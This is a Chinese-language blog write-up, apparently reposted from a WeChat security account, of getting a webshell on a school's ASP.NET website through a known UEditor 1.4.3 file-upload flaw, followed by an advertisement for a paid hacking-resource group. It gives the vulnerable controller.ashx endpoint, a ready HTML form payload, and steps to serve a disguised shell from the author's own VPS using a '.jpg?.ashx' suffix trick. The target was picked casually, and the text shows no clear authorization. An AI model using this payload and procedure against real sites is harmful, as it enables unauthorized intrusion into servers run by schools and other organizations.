SRC | 记一次走运某校官网Getshell

admin 2024年5月21日23:01:25评论10 views字数 1397阅读4分39秒阅读模式

声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关
该文由内部群师傅提供~
|0x01 前言
    某天早上上班,有些没睡醒,随意翻阅着QQ好友列表。咦!这个人头像挺好看的,点开个人资料卡查看,发现上面写着XX中学,善于搜索的我好奇地找到了这个学校的官网。
基于习惯,我点开Wappalyzer浏览器插件,是一个Microsoft ASP.NET写的网站。

SRC | 记一次走运某校官网Getshell

|0x02 发现

打开F12,查看JS文件(其实是为了摸鱼,不被领导发现0.0)。
发现ueditor百度编辑器!!!

SRC | 记一次走运某校官网Getshell

打开编辑器配置文件ueditor.config.js
找到服务器统一请求接口路径为:net/controller.ashx。

SRC | 记一次走运某校官网Getshell

|0x03 验证

在我印象中ueditor1.4.3版本是存在任意文件上传漏洞的,尝试访问公开nday POC链接:
http://xxx/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
漏洞存在!!!

SRC | 记一次走运某校官网Getshell

漏洞原因:
controller.ashx文件下只验证ContentType而没纠正文件后缀导致getshell。
有效负载如下,并保存为html格式
<form action="http://xxx/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"enctype="application/x-www-form-urlencoded"  method="POST">    shell addr: <input type="text" name="source[]" />                <input type="submit" value="Submit" /></form>

在自己的VPS上启动一个简易的HTTP服务,并传马(可以不用图片马,直接改后缀称为jpg)。

SRC | 记一次走运某校官网Getshell

VPS使用python启动http服务。
python -m http.server

SRC | 记一次走运某校官网Getshell

打开自己VPS的url,查看页面。

SRC | 记一次走运某校官网Getshell

打开刚才创建的html,输入框输入http://vps的ip/asp.jpg?.ashx 
点击提交。

SRC | 记一次走运某校官网Getshell

上传成功,返回如下

SRC | 记一次走运某校官网Getshell

访问shell,文件存在

SRC | 记一次走运某校官网Getshell

|0x04 总结

    如果是.net的网站,看一下JS文件是否存在百度编辑器。

| 知识星球的介绍

不好意思,兄弟们,这里给湘安无事星球打个广告,不喜欢的可以直接滑走哦。

1.群主为什么要建知识星球?

很简单为了恰饭哈哈哈,然后也是为了建立一个圈子进行交流学习和共享资源嘛相应的也收取费用嘛,毕竟维持星球也需要精力

2.知识星球有哪些资源?

群里面联系群主是可以要一些免费的学习资料的,因为群里面大部分是大学生嘛大学生不就是喜欢白嫖,所以大家会共享一些资料没有的群主wk也有,wk除了不会pc,其他都能嫖hhh

一些实战报告,截的部分

SRC | 记一次走运某校官网Getshell

SRC | 记一次走运某校官网Getshell

SRC | 记一次走运某校官网Getshell

一些1day的poc,这些也就是信息差,不想找可以绕wk帮你们嫖,群主也会经常发

SRC | 记一次走运某校官网Getshell

SRC | 记一次走运某校官网Getshell

一些共享的资源

1.刀客源码的会员2.fofa 360高级会员3.专属漏洞库5.专属内部it免费课程6.不定期直播分享(星球有录屏)

技术交流可加下方wx

SRC | 记一次走运某校官网Getshell

SRC | 记一次走运某校官网Getshell

SRC | 记一次走运某校官网Getshell

SRC | 记一次走运某校官网Getshell

原文始发于微信公众号(湘安无事):SRC | 记一次走运某校官网Getshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月21日23:01:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SRC | 记一次走运某校官网Getshellhttps://cn-sec.com/archives/2017492.html

发表评论

匿名网友 填写信息